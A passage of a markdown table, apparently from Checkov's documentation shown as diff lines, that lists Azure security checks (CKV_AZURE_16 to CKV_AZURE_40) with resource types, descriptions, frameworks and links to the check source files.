| Ensure web app is using the latest version of TLS encryption | Terraform | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py) | +| 1589 | CKV_AZURE_16 | resource | Microsoft.Web/sites | Ensure that Register with Azure Active Directory is enabled on App Service | arm | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py) | +| 1590 | CKV_AZURE_16 | resource | Microsoft.Web/sites | Ensure that Register with Azure Active Directory is enabled on App Service | Bicep | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py) | +| 1591 | CKV_AZURE_16 | resource | azurerm_app_service | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | +| 1592 | CKV_AZURE_16 | resource | azurerm_linux_web_app | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | +| 1593 | CKV_AZURE_16 | resource | azurerm_windows_web_app | Ensure that Register with Azure Active Directory is enabled on App Service | Terraform | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py) | +| 1594 | CKV_AZURE_17 | resource | Microsoft.Web/sites | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | arm | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py) | +| 1595 | CKV_AZURE_17 | resource | Microsoft.Web/sites | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Bicep | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py) | +| 1596 | CKV_AZURE_17 | resource | azurerm_app_service | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | +| 1597 | CKV_AZURE_17 | resource | azurerm_linux_web_app | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | +| 1598 | CKV_AZURE_17 | resource | azurerm_windows_web_app | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | Terraform | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py) | +| 1599 | CKV_AZURE_18 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest if used to run the web app | arm | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py) | +| 1600 | CKV_AZURE_18 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest if used to run the web app | Bicep | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py) | +| 1601 | CKV_AZURE_18 | resource | azurerm_app_service | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | +| 1602 | CKV_AZURE_18 | resource | azurerm_linux_web_app | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | +| 1603 | CKV_AZURE_18 | resource | azurerm_windows_web_app | Ensure that 'HTTP Version' is the latest if used to run the web app | Terraform | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py) | +| 1604 | CKV_AZURE_19 | resource | Microsoft.Security/pricings | Ensure that standard pricing tier is selected | arm | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py) | +| 1605 | CKV_AZURE_19 | resource | Microsoft.Security/pricings | Ensure that standard pricing tier is selected | Bicep | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py) | +| 1606 | CKV_AZURE_19 | resource | azurerm_security_center_subscription_pricing | Ensure that standard pricing tier is selected | Terraform | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterStandardPricing.py) | +| 1607 | CKV_AZURE_20 | resource | Microsoft.Security/securityContacts | Ensure that security contact 'Phone number' is set | arm | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py) | +| 1608 | CKV_AZURE_20 | resource | Microsoft.Security/securityContacts | Ensure that security contact 'Phone number' is set | Bicep | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py) | +| 1609 | CKV_AZURE_20 | resource | azurerm_security_center_contact | Ensure that security contact 'Phone number' is set | Terraform | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactPhone.py) | +| 1610 | CKV_AZURE_21 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | arm | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py) | +| 1611 | CKV_AZURE_21 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Bicep | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py) | +| 1612 | CKV_AZURE_21 | resource | azurerm_security_center_contact | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Terraform | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlert.py) | +| 1613 | CKV_AZURE_22 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | arm | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py) | +| 1614 | CKV_AZURE_22 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Bicep | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py) | +| 1615 | CKV_AZURE_22 | resource | azurerm_security_center_contact | Ensure that 'Send email notification for high severity alerts' is set to 'On' | Terraform | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlertAdmins.py) | +| 1616 | CKV_AZURE_23 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' is set to 'Enabled' for SQL servers | arm | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py) | +| 1617 | CKV_AZURE_23 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | +| 1618 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/auditingSettings | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | +| 1619 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases | Ensure that 'Auditing' is set to 'Enabled' for SQL servers | arm | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py) | +| 1620 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | +| 1621 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases/auditingSettings | Ensure that 'Auditing' is set to 'On' for SQL servers | Bicep | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml) | +| 1622 | CKV_AZURE_23 | resource | azurerm_mssql_server | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | +| 1623 | CKV_AZURE_23 | resource | azurerm_mssql_server_extended_auditing_policy | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | +| 1624 | CKV_AZURE_23 | resource | azurerm_sql_server | Ensure that 'Auditing' is set to 'On' for SQL servers | Terraform | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml) | +| 1625 | CKV_AZURE_24 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | arm | [SQLServerAuditingRetention90Days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingRetention90Days.py) | +| 1626 | CKV_AZURE_24 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Bicep | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml) | +| 1627 | CKV_AZURE_24 | resource | Microsoft.Sql/servers/auditingSettings | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Bicep | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml) | +| 1628 | CKV_AZURE_24 | resource | azurerm_mssql_server | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | +| 1629 | CKV_AZURE_24 | resource | azurerm_mssql_server_extended_auditing_policy | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | +| 1630 | CKV_AZURE_24 | resource | azurerm_sql_server | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | Terraform | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml) | +| 1631 | CKV_AZURE_25 | resource | Microsoft.Sql/servers/databases | Ensure that 'Threat Detection types' is set to 'All' | arm | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py) | +| 1632 | CKV_AZURE_25 | resource | Microsoft.Sql/servers/databases | Ensure that 'Threat Detection types' is set to 'All' | Bicep | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py) | +| 1633 | CKV_AZURE_25 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Threat Detection types' is set to 'All' | Terraform | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerThreatDetectionTypes.py) | +| 1634 | CKV_AZURE_26 | resource | Microsoft.Sql/servers/databases | Ensure that 'Send Alerts To' is enabled for MSSQL servers | arm | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py) | +| 1635 | CKV_AZURE_26 | resource | Microsoft.Sql/servers/databases | Ensure that 'Send Alerts To' is enabled for MSSQL servers | Bicep | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py) | +| 1636 | CKV_AZURE_26 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Send Alerts To' is enabled for MSSQL servers | Terraform | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsEnabled.py) | +| 1637 | CKV_AZURE_27 | resource | Microsoft.Sql/servers/databases | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | arm | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py) | +| 1638 | CKV_AZURE_27 | resource | Microsoft.Sql/servers/databases | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | Bicep | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py) | +| 1639 | CKV_AZURE_27 | resource | azurerm_mssql_server_security_alert_policy | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | Terraform | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsToAdminsEnabled.py) | +| 1640 | CKV_AZURE_28 | resource | Microsoft.DBforMySQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | arm | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py) | +| 1641 | CKV_AZURE_28 | resource | Microsoft.DBforMySQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | Bicep | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py) | +| 1642 | CKV_AZURE_28 | resource | azurerm_mysql_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | Terraform | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerSSLEnforcementEnabled.py) | +| 1643 | CKV_AZURE_29 | resource | Microsoft.DBforPostgreSQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | arm | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py) | +| 1644 | CKV_AZURE_29 | resource | Microsoft.DBforPostgreSQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | Bicep | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py) | +| 1645 | CKV_AZURE_29 | resource | azurerm_postgresql_server | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | Terraform | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerSSLEnforcementEnabled.py) | +| 1646 | CKV_AZURE_30 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | +| 1647 | CKV_AZURE_30 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | +| 1648 | CKV_AZURE_30 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogCheckpointsEnabled.py) | +| 1649 | CKV_AZURE_30 | resource | configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | +| 1650 | CKV_AZURE_30 | resource | configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | +| 1651 | CKV_AZURE_31 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | +| 1652 | CKV_AZURE_31 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | +| 1653 | CKV_AZURE_31 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_connections' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogConnectionsEnabled.py) | +| 1654 | CKV_AZURE_31 | resource | configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | +| 1655 | CKV_AZURE_31 | resource | configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | +| 1656 | CKV_AZURE_32 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 1657 | CKV_AZURE_32 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 1658 | CKV_AZURE_32 | resource | azurerm_postgresql_configuration | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 1659 | CKV_AZURE_32 | resource | configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 1660 | CKV_AZURE_32 | resource | configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | Bicep | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | +| 1661 | CKV_AZURE_33 | resource | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests | arm | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py) | +| 1662 | CKV_AZURE_33 | resource | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests | Bicep | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py) | +| 1663 | CKV_AZURE_33 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Queue service for read, write and delete requests | Terraform | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountLoggingQueueServiceEnabled.py) | +| 1664 | CKV_AZURE_34 | resource | Microsoft.Storage/storageAccounts/blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 1665 | CKV_AZURE_34 | resource | Microsoft.Storage/storageAccounts/blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 1666 | CKV_AZURE_34 | resource | azurerm_storage_container | Ensure that 'Public access level' is set to Private for blob containers | Terraform | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobServiceContainerPrivateAccess.py) | +| 1667 | CKV_AZURE_34 | resource | blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 1668 | CKV_AZURE_34 | resource | blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 1669 | CKV_AZURE_34 | resource | containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 1670 | CKV_AZURE_34 | resource | containers | Ensure that 'Public access level' is set to Private for blob containers | Bicep | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | +| 1671 | CKV_AZURE_35 | resource | Microsoft.Storage/storageAccounts | Ensure default network access rule for Storage Accounts is set to deny | arm | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDefaultNetworkAccessDeny.py) | +| 1672 | CKV_AZURE_35 | resource | Microsoft.Storage/storageAccounts | Ensure default network access rule for Storage Accounts is set to deny | Bicep | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | +| 1673 | CKV_AZURE_35 | resource | azurerm_storage_account | Ensure default network access rule for Storage Accounts is set to deny | Terraform | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | +| 1674 | CKV_AZURE_35 | resource | azurerm_storage_account_network_rules | Ensure default network access rule for Storage Accounts is set to deny | Terraform | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDefaultNetworkAccessDeny.py) | +| 1675 | CKV_AZURE_36 | resource | Microsoft.Storage/storageAccounts | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | arm | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountAzureServicesAccessEnabled.py) | +| 1676 | CKV_AZURE_36 | resource | Microsoft.Storage/storageAccounts | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Bicep | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | +| 1677 | CKV_AZURE_36 | resource | azurerm_storage_account | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | +| 1678 | CKV_AZURE_36 | resource | azurerm_storage_account_network_rules | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | Terraform | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountAzureServicesAccessEnabled.py) | +| 1679 | CKV_AZURE_37 | resource | Microsoft.Insights/logprofiles | Ensure that Activity Log Retention is set 365 days or greater | arm | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py) | +| 1680 | CKV_AZURE_37 | resource | Microsoft.Insights/logprofiles | Ensure that Activity Log Retention is set 365 days or greater | Bicep | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py) | +| 1681 | CKV_AZURE_37 | resource | azurerm_monitor_log_profile | Ensure that Activity Log Retention is set 365 days or greater | Terraform | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileRetentionDays.py) | +| 1682 | CKV_AZURE_38 | resource | Microsoft.Insights/logprofiles | Ensure audit profile captures all the activities | arm | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py) | +| 1683 | CKV_AZURE_38 | resource | Microsoft.Insights/logprofiles | Ensure audit profile captures all the activities | Bicep | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py) | +| 1684 | CKV_AZURE_38 | resource | azurerm_monitor_log_profile | Ensure audit profile captures all the activities | Terraform | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MonitorLogProfileCategories.py) | +| 1685 | CKV_AZURE_39 | resource | Microsoft.Authorization/roleDefinitions | Ensure that no custom subscription owner roles are created | arm | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py) | +| 1686 | CKV_AZURE_39 | resource | Microsoft.Authorization/roleDefinitions | Ensure that no custom subscription owner roles are created | Bicep | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py) | +| 1687 | CKV_AZURE_39 | resource | azurerm_role_definition | Ensure that no custom subscription owner roles are created | Terraform | [CutsomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CutsomRoleDefinitionSubscriptionOwner.py) | +| 1688 | CKV_AZURE_40 | resource | Microsoft.KeyVault/vaults/keys | Ensure that the expiration date is set on all keys | arm | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py) | +| 1689 | CKV_AZURE_40 | resource | Microsoft.KeyVault/vaults/keys | Ensure that the expiration date is set on all keys | Bicep | 